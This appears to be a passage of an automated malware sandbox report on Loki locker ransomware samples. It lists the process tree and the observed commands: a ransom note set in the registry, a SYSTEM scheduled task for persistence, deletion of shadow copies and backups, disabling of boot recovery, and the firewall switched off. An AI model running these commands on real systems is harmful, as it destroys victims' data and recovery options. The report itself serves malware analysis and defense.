PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

System policy modification

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by Loki locker" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: [email protected]\r\nWrite this ID in the title of your message: 9FF76E0A\r\nIn case of no answer in 24 hours write us to this e-mail: [email protected]" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bazaar.abuse.ch/browse.php?search=tag%3Alocker

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7ffb3574f208,0x7ffb3574f214,0x7ffb3574f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1860,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2572,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5068,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4692,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5476,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6084,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5540,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5140,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=4904,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\" -ad -an -ai#7zMap23165:190:7zEvent4419

C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe

"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6416,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7084 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5264,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5076,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:8

C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe

"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"

C:\Windows\system32\pcwrun.exe

C:\Windows\system32\pcwrun.exe "C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe" ContextMenu

C:\Windows\System32\msdt.exe

C:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWFFB8.xml /skip TRUE

C:\Windows\System32\sdiagnhost.exe

C:\Windows\System32\sdiagnhost.exe -Embedding

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxajrlbz\dxajrlbz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40D.tmp" "c:\Users\Admin\AppData\Local\Temp\dxajrlbz\CSC2575887E8B184585B3B9C44FB5636CE2.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4sok3ih\s4sok3ih.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46B.tmp" "c:\Users\Admin\AppData\Local\Temp\s4sok3ih\CSC502B6C4B714E42C08C50A36E9A33D40.TMP"

C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe

"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3992,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=5260,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=896,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\00acf5d0db7ef50140dae7a3482d9db80704ec98670bd1607e76c99382a4888c\" -ad -an -ai#7zMap24245:190:7zEvent14566

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3460,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2948,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5448,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7064,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4880,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\" -ad -an -ai#7zMap8206:190:7zEvent11735

C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe

"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe"

C:\Windows\system32\net.exe

"net" session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\README-7ILxnOHKLf.md

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3236,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=5212,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\" -ad -an -ai#7zMap295:190:7zEvent31045

C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe

"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\winlogon.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\winlogon.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2osrakf2\2osrakf2.cmdline"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F

C:\ProgramData\winlogon.exe

C:\ProgramData\winlogon.exe

C:\Windows\winlogon.exe

C:\Windows\winlogon.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1C6.tmp" "c:\ProgramData\CSC8BF11E4749A64B498E688F446F4116AB.TMP"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Restore-My-Files.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

